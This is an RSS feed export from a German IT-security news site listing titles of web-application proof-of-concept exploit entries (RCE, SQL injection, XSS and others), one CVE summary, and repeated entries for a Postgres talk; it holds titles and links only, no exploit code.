<?xml version="1.0" encoding="UTF-8" ?>
<?xml-stylesheet type="text/xsl" href="/rss-style.xsl"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:media="http://search.yahoo.com/mrss/" xmlns:dc="http://purl.org/dc/elements/1.1/">
<channel>
<title><![CDATA[Team IT Security - 📰 Alle Kategorien]]></title>
<link><![CDATA[https://tsecurity.de/export/rss/alle-kategorien.xml?q=webapps+solaredge+csrfoobinjection%2F]]></link>
<description><![CDATA[Das Gesamte Cyber Threat Intelligence Feed-Archiv von TSecurity.de. Alle Nachrichten, Sicherheitsmeldungen, Videos, Downloads und Analysen in einer zentralen Übersicht.]]></description>
<language>de-DE</language>
<lastBuildDate>Wed, 29 Jul 2026 08:32:33 +0200</lastBuildDate>
<pubDate>Wed, 29 Jul 2026 08:32:33 +0200</pubDate>
<ttl>15</ttl>
<copyright>2026 Team IT Security</copyright>
<managingEditor>lakandor@tsecurity.de (Horus Sirius)</managingEditor>
<webMaster>lakandor@tsecurity.de (Horus Sirius)</webMaster>
<category>IT Security</category>
<category>Cybersecurity</category>
<category>Nachrichten</category>
<generator>Team IT Security RSS Generator v2.0</generator>
<image>
<url>https://tsecurity.de/favicon.ico</url>
<title><![CDATA[Team IT Security - 📰 Alle Kategorien]]></title>
<link><![CDATA[https://tsecurity.de/export/rss/alle-kategorien.xml?q=webapps+solaredge+csrfoobinjection%2F]]></link>
</image>
<atom:link href="https://tsecurity.de/export/rss/it-security.xml?q=webapps+solaredge+csrfoobinjection%2F" rel="self" type="application/rss+xml" />
<item>
<title><![CDATA[[webapps] Atarim WordPress Plugin  4.2.2 - Sensitive Information Exposure]]></title>
<description><![CDATA[Atarim WordPress Plugin  4.2.2 - Sensitive Information Exposure]]></description>
<link>https://tsecurity.de/de/3654511/poc/webapps-atarim-wordpress-plugin-422-sensitive-information-exposure/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3654511/poc/webapps-atarim-wordpress-plugin-422-sensitive-information-exposure/</guid>
<pubDate>Wed, 08 Jul 2026 15:54:08 +0200</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Atarim WordPress Plugin  4.2.2 - Sensitive Information Exposure]]></content:encoded>
</item>
<item>
<title><![CDATA[[webapps] Krayin CRM v2.2.x - Authenticated Remote Code Execution]]></title>
<description><![CDATA[Krayin CRM v2.2.x - Authenticated Remote Code Execution]]></description>
<link>https://tsecurity.de/de/3654510/poc/webapps-krayin-crm-v22x-authenticated-remote-code-execution/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3654510/poc/webapps-krayin-crm-v22x-authenticated-remote-code-execution/</guid>
<pubDate>Wed, 08 Jul 2026 15:54:07 +0200</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Krayin CRM v2.2.x - Authenticated Remote Code Execution]]></content:encoded>
</item>
<item>
<title><![CDATA[[webapps] Langflow 1.9.0 - RCE]]></title>
<description><![CDATA[Langflow 1.9.0 - RCE]]></description>
<link>https://tsecurity.de/de/3654473/poc/webapps-langflow-190-rce/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3654473/poc/webapps-langflow-190-rce/</guid>
<pubDate>Wed, 08 Jul 2026 15:36:47 +0200</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Langflow 1.9.0 - RCE]]></content:encoded>
</item>
<item>
<title><![CDATA[[webapps] Joomla Page Builder CK  3.5.10 -  Arbitrary File Upload]]></title>
<description><![CDATA[Joomla Page Builder CK  3.5.10 -  Arbitrary File Upload]]></description>
<link>https://tsecurity.de/de/3654472/poc/webapps-joomla-page-builder-ck-3510-arbitrary-file-upload/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3654472/poc/webapps-joomla-page-builder-ck-3510-arbitrary-file-upload/</guid>
<pubDate>Wed, 08 Jul 2026 15:36:46 +0200</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Joomla Page Builder CK  3.5.10 -  Arbitrary File Upload]]></content:encoded>
</item>
<item>
<title><![CDATA[[webapps] MCPJam Inspector - Remote Code Execution]]></title>
<description><![CDATA[MCPJam Inspector - Remote Code Execution]]></description>
<link>https://tsecurity.de/de/3651885/poc/webapps-mcpjam-inspector-remote-code-execution/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3651885/poc/webapps-mcpjam-inspector-remote-code-execution/</guid>
<pubDate>Tue, 07 Jul 2026 16:39:54 +0200</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[MCPJam Inspector - Remote Code Execution]]></content:encoded>
</item>
<item>
<title><![CDATA[[webapps] Flowise  3.1.3 - arbitrary code execution]]></title>
<description><![CDATA[Flowise  3.1.3 - arbitrary code execution]]></description>
<link>https://tsecurity.de/de/3651737/poc/webapps-flowise-313-arbitrary-code-execution/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3651737/poc/webapps-flowise-313-arbitrary-code-execution/</guid>
<pubDate>Tue, 07 Jul 2026 15:52:40 +0200</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Flowise  3.1.3 - arbitrary code execution]]></content:encoded>
</item>
<item>
<title><![CDATA[[webapps] Discuz! X5.0 - Authentication Bypass]]></title>
<description><![CDATA[Discuz! X5.0 - Authentication Bypass]]></description>
<link>https://tsecurity.de/de/3651709/poc/webapps-discuz-x50-authentication-bypass/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3651709/poc/webapps-discuz-x50-authentication-bypass/</guid>
<pubDate>Tue, 07 Jul 2026 15:38:50 +0200</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Discuz! X5.0 - Authentication Bypass]]></content:encoded>
</item>
<item>
<title><![CDATA[[webapps] WordPress Bricks Builder Theme  -  RCE]]></title>
<description><![CDATA[WordPress Bricks Builder Theme  -  RCE]]></description>
<link>https://tsecurity.de/de/3651708/poc/webapps-wordpress-bricks-builder-theme-rce/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3651708/poc/webapps-wordpress-bricks-builder-theme-rce/</guid>
<pubDate>Tue, 07 Jul 2026 15:38:48 +0200</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[WordPress Bricks Builder Theme  -  RCE]]></content:encoded>
</item>
<item>
<title><![CDATA[[webapps] Tenable Nessus 10.12.1 - SQL Injection]]></title>
<description><![CDATA[Tenable Nessus 10.12.1 - SQL Injection]]></description>
<link>https://tsecurity.de/de/3651707/poc/webapps-tenable-nessus-10121-sql-injection/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3651707/poc/webapps-tenable-nessus-10121-sql-injection/</guid>
<pubDate>Tue, 07 Jul 2026 15:38:47 +0200</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Tenable Nessus 10.12.1 - SQL Injection]]></content:encoded>
</item>
<item>
<title><![CDATA[[webapps] KeepInMind 0.8.4.2 -  Stored XSS]]></title>
<description><![CDATA[KeepInMind 0.8.4.2 -  Stored XSS]]></description>
<link>https://tsecurity.de/de/3648885/poc/webapps-keepinmind-0842-stored-xss/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3648885/poc/webapps-keepinmind-0842-stored-xss/</guid>
<pubDate>Mon, 06 Jul 2026 15:40:50 +0200</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[KeepInMind 0.8.4.2 -  Stored XSS]]></content:encoded>
</item>
<item>
<title><![CDATA[[webapps] Joomla Extension 4.1.4 - PHP Object injection]]></title>
<description><![CDATA[Joomla Extension 4.1.4 - PHP Object injection]]></description>
<link>https://tsecurity.de/de/3648883/poc/webapps-joomla-extension-414-php-object-injection/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3648883/poc/webapps-joomla-extension-414-php-object-injection/</guid>
<pubDate>Mon, 06 Jul 2026 15:40:48 +0200</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Joomla Extension 4.1.4 - PHP Object injection]]></content:encoded>
</item>
<item>
<title><![CDATA[[webapps] Pulpy 0.1.1-Beta - Filesystem Sandbox Bypass]]></title>
<description><![CDATA[Pulpy 0.1.1-Beta - Filesystem Sandbox Bypass]]></description>
<link>https://tsecurity.de/de/3648882/poc/webapps-pulpy-011-beta-filesystem-sandbox-bypass/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3648882/poc/webapps-pulpy-011-beta-filesystem-sandbox-bypass/</guid>
<pubDate>Mon, 06 Jul 2026 15:40:47 +0200</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Pulpy 0.1.1-Beta - Filesystem Sandbox Bypass]]></content:encoded>
</item>
<item>
<title><![CDATA[[webapps] WordPress Plugin WPZOOM Portfolio 1.4.21 -  Reflected Cross-Site Scripting (XSS)]]></title>
<description><![CDATA[WordPress Plugin WPZOOM Portfolio 1.4.21 -  Reflected Cross-Site Scripting (XSS)]]></description>
<link>https://tsecurity.de/de/3648832/poc/webapps-wordpress-plugin-wpzoom-portfolio-1421-reflected-cross-site-scripting-xss/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3648832/poc/webapps-wordpress-plugin-wpzoom-portfolio-1421-reflected-cross-site-scripting-xss/</guid>
<pubDate>Mon, 06 Jul 2026 15:21:28 +0200</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[WordPress Plugin WPZOOM Portfolio 1.4.21 -  Reflected Cross-Site Scripting (XSS)]]></content:encoded>
</item>
<item>
<title><![CDATA[[webapps] KNX visualisering - Broken Access Control]]></title>
<description><![CDATA[KNX visualisering - Broken Access Control]]></description>
<link>https://tsecurity.de/de/3648831/poc/webapps-knx-visualisering-broken-access-control/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3648831/poc/webapps-knx-visualisering-broken-access-control/</guid>
<pubDate>Mon, 06 Jul 2026 15:21:27 +0200</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[KNX visualisering - Broken Access Control]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2022-39196 | BlackBoard Learn 1.10.1 webapps/bbcms/execute/ access control (EUVD-2022-41741)]]></title>
<description><![CDATA[A vulnerability was found in BlackBoard Learn 1.10.1 and classified as critical. This vulnerability affects unknown code of the file webapps/bbcms/execute/. Such manipulation leads to improper access controls.

This vulnerability is listed as CVE-2022-39196. The attack may be performed from remot...]]></description>
<link>https://tsecurity.de/de/3631164/sicherheitsluecken/cve-2022-39196-blackboard-learn-1101-webappsbbcmsexecute-access-control-euvd-2022-41741/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3631164/sicherheitsluecken/cve-2022-39196-blackboard-learn-1101-webappsbbcmsexecute-access-control-euvd-2022-41741/</guid>
<pubDate>Sun, 28 Jun 2026 16:38:55 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/product/blackboard:learn">BlackBoard Learn 1.10.1</a> and classified as <a href="https://vuldb.com/kb/risk">critical</a>. This vulnerability affects unknown code of the file <em>webapps/bbcms/execute/</em>. Such manipulation leads to improper access controls.

This vulnerability is listed as <a href="https://vuldb.com/cve/CVE-2022-39196">CVE-2022-39196</a>. The attack may be performed from remote. There is no available exploit.]]></content:encoded>
</item>
<item>
<title><![CDATA[introducing pgreflex - an open source convex alternative for postgres (gpn24)]]></title>
<description><![CDATA[Convex is a TypeScript framework* that makes one promise: "if you change a value in the database, no matter how, it'll update in the frontend automatically."

This is great - imagine writing a comment, and everyone with the page open sees it immideately. If you imagine the normal todo-list exampl...]]></description>
<link>https://tsecurity.de/de/3622518/it-security-video/introducing-pgreflex-an-open-source-convex-alternative-for-postgres-gpn24/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3622518/it-security-video/introducing-pgreflex-an-open-source-convex-alternative-for-postgres-gpn24/</guid>
<pubDate>Wed, 24 Jun 2026 20:49:27 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Convex is a TypeScript framework* that makes one promise: &quot;if you change a value in the database, no matter how, it'll update in the frontend automatically.&quot;

This is great - imagine writing a comment, and everyone with the page open sees it immideately. If you imagine the normal todo-list example for webdev, you checkmark a task in one tab, and it immediately updates for everyone. 

However, despite being open-source, convex is developed by a VC-backed company, and runs on a properitary database - you can only interface with it through their properitary libraries. Simple functions like COUNT aren't supported, and require hacky workarounds. You can't write a simple UPDATE statement. Migrations and schemas are loosely enforced. 

All of these restrictions led to me writing pgreflex - a fully free + open-source, community-driven postgres-based alternative. Instead of writing a custom database, pgreflex simply subscribes to postgres' write-ahead-log (WAL) via logical replication - and notifies the app server if something changed. No properitary lock-in, and only a simple, thin library you can use with your existing stack.

* Note: Even for people who can't immediately use pgreflex (not writing TypeScript servers, ...) the underlying tech of &quot;listen to WAL to invalidate queries and propagate changes&quot; is powerful. I promise this talk could be useful if you write rust webapps, too. Or Go webapps. Or python. Or anything, really. It probably could work with mysql, too.

In the talk, we'll cover:

- Why doing what convex allows you do to is *really cool* from a UX perspective
- How does pgreflex work (subscribe to WAL, invalidate)
- Challenges and drawbacks of the approach, incl. complexity, latency, and computational overhead
- How would you use it off-the-shelf in a TypeScript + tRPC + drizzle project
- How other programming languages might implement the same

Maybe: a couple of benchmarks (pgreflex vs. convex on same server), if I manage to finish those before GPN

Community contributions welcome :)

Licensed to the public under https://creativecommons.org/licenses/by/4.0/
about this event: https://cfp.gulas.ch/gpn24/talk/EGXV8L/]]></content:encoded>
</item>
<item>
<title><![CDATA[[webapps] OpenEMR 7.0.2 - Arbitrary File Read]]></title>
<description><![CDATA[OpenEMR 7.0.2 - Arbitrary File Read]]></description>
<link>https://tsecurity.de/de/3581651/poc/webapps-openemr-702-arbitrary-file-read/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3581651/poc/webapps-openemr-702-arbitrary-file-read/</guid>
<pubDate>Mon, 08 Jun 2026 15:53:41 +0200</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[OpenEMR 7.0.2 - Arbitrary File Read]]></content:encoded>
</item>
<item>
<title><![CDATA[moritz: introducing pgreflex - an open source convex alternative for postgres]]></title>
<description><![CDATA[Author: media.ccc.de - Bewertung: 1x - Views:30 https://media.ccc.de/v/gpn24-659-introducing-pgreflex-an-open-source-convex-alternative-for-postgres

Convex is a TypeScript framework* that makes one promise: "if you change a value in the database, no matter how, it'll update in the frontend autom...]]></description>
<link>https://tsecurity.de/de/3579106/it-security-video/moritz-introducing-pgreflex-an-open-source-convex-alternative-for-postgres/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3579106/it-security-video/moritz-introducing-pgreflex-an-open-source-convex-alternative-for-postgres/</guid>
<pubDate>Sun, 07 Jun 2026 11:18:43 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: media.ccc.de - Bewertung: 1x - Views:30 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/IBaAFqAc21c?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>https://media.ccc.de/v/gpn24-659-introducing-pgreflex-an-open-source-convex-alternative-for-postgres<br />
<br />
Convex is a TypeScript framework* that makes one promise: "if you change a value in the database, no matter how, it'll update in the frontend automatically."<br />
<br />
This is great - imagine writing a comment, and everyone with the page open sees it immideately. If you imagine the normal todo-list example for webdev, you checkmark a task in one tab, and it immediately updates for everyone. <br />
<br />
However, despite being open-source, convex is developed by a VC-backed company, and runs on a properitary database - you can only interface with it through their properitary libraries. Simple functions like COUNT aren't supported, and require hacky workarounds. You can't write a simple UPDATE statement. Migrations and schemas are loosely enforced. <br />
<br />
All of these restrictions led to me writing pgreflex - a fully free + open-source, community-driven postgres-based alternative. Instead of writing a custom database, pgreflex simply subscribes to postgres' write-ahead-log (WAL) via logical replication - and notifies the app server if something changed. No properitary lock-in, and only a simple, thin library you can use with your existing stack.<br />
<br />
* Note: Even for people who can't immediately use pgreflex (not writing TypeScript servers, ...) the underlying tech of "listen to WAL to invalidate queries and propagate changes" is powerful. I promise this talk could be useful if you write rust webapps, too. Or Go webapps. Or python. Or anything, really. It probably could work with mysql, too.<br />
<br />
In the talk, we'll cover:<br />
<br />
- Why doing what convex allows you do to is *really cool* from a UX perspective<br />
- How does pgreflex work (subscribe to WAL, invalidate)<br />
- Challenges and drawbacks of the approach, incl. complexity, latency, and computational overhead<br />
- How would you use it off-the-shelf in a TypeScript + tRPC + drizzle project<br />
- How other programming languages might implement the same<br />
<br />
Maybe: a couple of benchmarks (pgreflex vs. convex on same server), if I manage to finish those before GPN<br />
<br />
Community contributions welcome :)<br />
<br />
moritz<br />
<br />
https://cfp.gulas.ch/gpn24/talk/EGXV8L/<br />
<br />
#gpn24 #SoftwareandInfrastructure<br />
<br />
Licensed to the public under https://creativecommons.org/licenses/by/4.0/<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[introducing pgreflex - an open source convex alternative for postgres (gpn24)]]></title>
<description><![CDATA[Convex is a TypeScript framework* that makes one promise: "if you change a value in the database, no matter how, it'll update in the frontend automatically."

This is great - imagine writing a comment, and everyone with the page open sees it immideately. If you imagine the normal todo-list exampl...]]></description>
<link>https://tsecurity.de/de/3579077/it-security-video/introducing-pgreflex-an-open-source-convex-alternative-for-postgres-gpn24/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3579077/it-security-video/introducing-pgreflex-an-open-source-convex-alternative-for-postgres-gpn24/</guid>
<pubDate>Sun, 07 Jun 2026 11:03:05 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Convex is a TypeScript framework* that makes one promise: &quot;if you change a value in the database, no matter how, it'll update in the frontend automatically.&quot;

This is great - imagine writing a comment, and everyone with the page open sees it immideately. If you imagine the normal todo-list example for webdev, you checkmark a task in one tab, and it immediately updates for everyone. 

However, despite being open-source, convex is developed by a VC-backed company, and runs on a properitary database - you can only interface with it through their properitary libraries. Simple functions like COUNT aren't supported, and require hacky workarounds. You can't write a simple UPDATE statement. Migrations and schemas are loosely enforced. 

All of these restrictions led to me writing pgreflex - a fully free + open-source, community-driven postgres-based alternative. Instead of writing a custom database, pgreflex simply subscribes to postgres' write-ahead-log (WAL) via logical replication - and notifies the app server if something changed. No properitary lock-in, and only a simple, thin library you can use with your existing stack.

* Note: Even for people who can't immediately use pgreflex (not writing TypeScript servers, ...) the underlying tech of &quot;listen to WAL to invalidate queries and propagate changes&quot; is powerful. I promise this talk could be useful if you write rust webapps, too. Or Go webapps. Or python. Or anything, really. It probably could work with mysql, too.

In the talk, we'll cover:

- Why doing what convex allows you do to is *really cool* from a UX perspective
- How does pgreflex work (subscribe to WAL, invalidate)
- Challenges and drawbacks of the approach, incl. complexity, latency, and computational overhead
- How would you use it off-the-shelf in a TypeScript + tRPC + drizzle project
- How other programming languages might implement the same

Maybe: a couple of benchmarks (pgreflex vs. convex on same server), if I manage to finish those before GPN

Community contributions welcome :)

Licensed to the public under https://creativecommons.org/licenses/by/4.0/
about this event: https://cfp.gulas.ch/gpn24/talk/EGXV8L/]]></content:encoded>
</item>
<item>
<title><![CDATA[[webapps] WordPress Contest Gallery 28.1.4 - Unauthenticated Blind SQL Injection]]></title>
<description><![CDATA[WordPress Contest Gallery 28.1.4 - Unauthenticated Blind SQL Injection]]></description>
<link>https://tsecurity.de/de/3575179/poc/webapps-wordpress-contest-gallery-2814-unauthenticated-blind-sql-injection/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3575179/poc/webapps-wordpress-contest-gallery-2814-unauthenticated-blind-sql-injection/</guid>
<pubDate>Fri, 05 Jun 2026 13:21:16 +0200</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[WordPress Contest Gallery 28.1.4 - Unauthenticated Blind SQL Injection]]></content:encoded>
</item>
<item>
<title><![CDATA[[webapps] WordPress OrderConvo 14 - Path Traversal]]></title>
<description><![CDATA[WordPress OrderConvo 14 - Path Traversal]]></description>
<link>https://tsecurity.de/de/3563956/poc/webapps-wordpress-orderconvo-14-path-traversal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3563956/poc/webapps-wordpress-orderconvo-14-path-traversal/</guid>
<pubDate>Mon, 01 Jun 2026 19:52:20 +0200</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[WordPress OrderConvo 14 - Path Traversal]]></content:encoded>
</item>
<item>
<title><![CDATA[[webapps] Drupal Core 10.5.5 - Error-Based SQL Injection]]></title>
<description><![CDATA[Drupal Core 10.5.5 - Error-Based SQL Injection]]></description>
<link>https://tsecurity.de/de/3563955/poc/webapps-drupal-core-1055-error-based-sql-injection/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3563955/poc/webapps-drupal-core-1055-error-based-sql-injection/</guid>
<pubDate>Mon, 01 Jun 2026 19:52:18 +0200</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Drupal Core 10.5.5 - Error-Based SQL Injection]]></content:encoded>
</item>
<item>
<title><![CDATA[[webapps] YAMCS yamcs-core  5.12.7 - No Rate Limiting]]></title>
<description><![CDATA[YAMCS yamcs-core  5.12.7 - No Rate Limiting]]></description>
<link>https://tsecurity.de/de/3559127/poc/webapps-yamcs-yamcs-core-5127-no-rate-limiting/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3559127/poc/webapps-yamcs-yamcs-core-5127-no-rate-limiting/</guid>
<pubDate>Sat, 30 May 2026 15:39:01 +0200</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[YAMCS yamcs-core  5.12.7 - No Rate Limiting]]></content:encoded>
</item>
<item>
<title><![CDATA[[webapps] YAMCS yamcs-core  5.12.7 - User Enumeration]]></title>
<description><![CDATA[YAMCS yamcs-core  5.12.7 - User Enumeration]]></description>
<link>https://tsecurity.de/de/3559126/poc/webapps-yamcs-yamcs-core-5127-user-enumeration/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3559126/poc/webapps-yamcs-yamcs-core-5127-user-enumeration/</guid>
<pubDate>Sat, 30 May 2026 15:39:00 +0200</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[YAMCS yamcs-core  5.12.7 - User Enumeration]]></content:encoded>
</item>
<item>
<title><![CDATA[[webapps] YAMCS yamcs-core  5.12.7 - LDAP Injection]]></title>
<description><![CDATA[YAMCS yamcs-core  5.12.7 - LDAP Injection]]></description>
<link>https://tsecurity.de/de/3559111/poc/webapps-yamcs-yamcs-core-5127-ldap-injection/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3559111/poc/webapps-yamcs-yamcs-core-5127-ldap-injection/</guid>
<pubDate>Sat, 30 May 2026 15:23:23 +0200</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[YAMCS yamcs-core  5.12.7 - LDAP Injection]]></content:encoded>
</item>
<item>
<title><![CDATA[[webapps] MikroORM   7.0.13 - SQL Injection]]></title>
<description><![CDATA[MikroORM   7.0.13 - SQL Injection]]></description>
<link>https://tsecurity.de/de/3556531/poc/webapps-mikroorm-7013-sql-injection/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3556531/poc/webapps-mikroorm-7013-sql-injection/</guid>
<pubDate>Fri, 29 May 2026 10:38:15 +0200</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[MikroORM   7.0.13 - SQL Injection]]></content:encoded>
</item>
<item>
<title><![CDATA[[webapps] Langflow 1.3.0 - Remote Code Execution]]></title>
<description><![CDATA[Langflow 1.3.0 - Remote Code Execution]]></description>
<link>https://tsecurity.de/de/3556481/poc/webapps-langflow-130-remote-code-execution/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3556481/poc/webapps-langflow-130-remote-code-execution/</guid>
<pubDate>Fri, 29 May 2026 10:22:03 +0200</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Langflow 1.3.0 - Remote Code Execution]]></content:encoded>
</item>
<item>
<title><![CDATA[[webapps] Quick Playground for WordPress 1.3.1 - Unauthenticated Remote Code Execution]]></title>
<description><![CDATA[Quick Playground for WordPress 1.3.1 - Unauthenticated Remote Code Execution]]></description>
<link>https://tsecurity.de/de/3556480/poc/webapps-quick-playground-for-wordpress-131-unauthenticated-remote-code-execution/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3556480/poc/webapps-quick-playground-for-wordpress-131-unauthenticated-remote-code-execution/</guid>
<pubDate>Fri, 29 May 2026 10:22:01 +0200</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Quick Playground for WordPress 1.3.1 - Unauthenticated Remote Code Execution]]></content:encoded>
</item>
<item>
<title><![CDATA[[webapps] Prodigy Commerce 3.3.0 - Local File Inclusion]]></title>
<description><![CDATA[Prodigy Commerce 3.3.0 - Local File Inclusion]]></description>
<link>https://tsecurity.de/de/3556479/poc/webapps-prodigy-commerce-330-local-file-inclusion/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3556479/poc/webapps-prodigy-commerce-330-local-file-inclusion/</guid>
<pubDate>Fri, 29 May 2026 10:22:00 +0200</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Prodigy Commerce 3.3.0 - Local File Inclusion]]></content:encoded>
</item>
<item>
<title><![CDATA[[webapps] MixPHP Framework 2.2.17 - Unsafe Deserialization Remote Code Execution]]></title>
<description><![CDATA[MixPHP Framework 2.2.17 - Unsafe Deserialization Remote Code Execution]]></description>
<link>https://tsecurity.de/de/3556414/poc/webapps-mixphp-framework-2217-unsafe-deserialization-remote-code-execution/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3556414/poc/webapps-mixphp-framework-2217-unsafe-deserialization-remote-code-execution/</guid>
<pubDate>Fri, 29 May 2026 09:54:52 +0200</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[MixPHP Framework 2.2.17 - Unsafe Deserialization Remote Code Execution]]></content:encoded>
</item>
<item>
<title><![CDATA[[webapps] CubeCart < 6.7.0 - Reflected Cross-Site Scripting (XSS) (Unauthenticated)]]></title>
<description><![CDATA[CubeCart < 6.7.0 - Reflected Cross-Site Scripting (XSS) (Unauthenticated)]]></description>
<link>https://tsecurity.de/de/3556273/poc/webapps-cubecart-670-reflected-cross-site-scripting-xss-unauthenticated/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3556273/poc/webapps-cubecart-670-reflected-cross-site-scripting-xss-unauthenticated/</guid>
<pubDate>Fri, 29 May 2026 08:35:49 +0200</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[CubeCart &lt; 6.7.0 - Reflected Cross-Site Scripting (XSS) (Unauthenticated)]]></content:encoded>
</item>
<item>
<title><![CDATA[[webapps] EspoCRM 9.3.3 -  SSRF]]></title>
<description><![CDATA[EspoCRM 9.3.3 -  SSRF]]></description>
<link>https://tsecurity.de/de/3551242/poc/webapps-espocrm-933-ssrf/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3551242/poc/webapps-espocrm-933-ssrf/</guid>
<pubDate>Wed, 27 May 2026 15:27:12 +0200</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[EspoCRM 9.3.3 -  SSRF]]></content:encoded>
</item>
<item>
<title><![CDATA[[webapps] Casdoor 3.54.1 - Arbitrary File Write via Path Traversal]]></title>
<description><![CDATA[Casdoor 3.54.1 - Arbitrary File Write via Path Traversal]]></description>
<link>https://tsecurity.de/de/3551241/poc/webapps-casdoor-3541-arbitrary-file-write-via-path-traversal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3551241/poc/webapps-casdoor-3541-arbitrary-file-write-via-path-traversal/</guid>
<pubDate>Wed, 27 May 2026 15:27:10 +0200</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Casdoor 3.54.1 - Arbitrary File Write via Path Traversal]]></content:encoded>
</item>
<item>
<title><![CDATA[[webapps] scramble - Remote Code Execution]]></title>
<description><![CDATA[scramble - Remote Code Execution]]></description>
<link>https://tsecurity.de/de/3551185/poc/webapps-scramble-remote-code-execution/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3551185/poc/webapps-scramble-remote-code-execution/</guid>
<pubDate>Wed, 27 May 2026 15:09:36 +0200</pubDate>
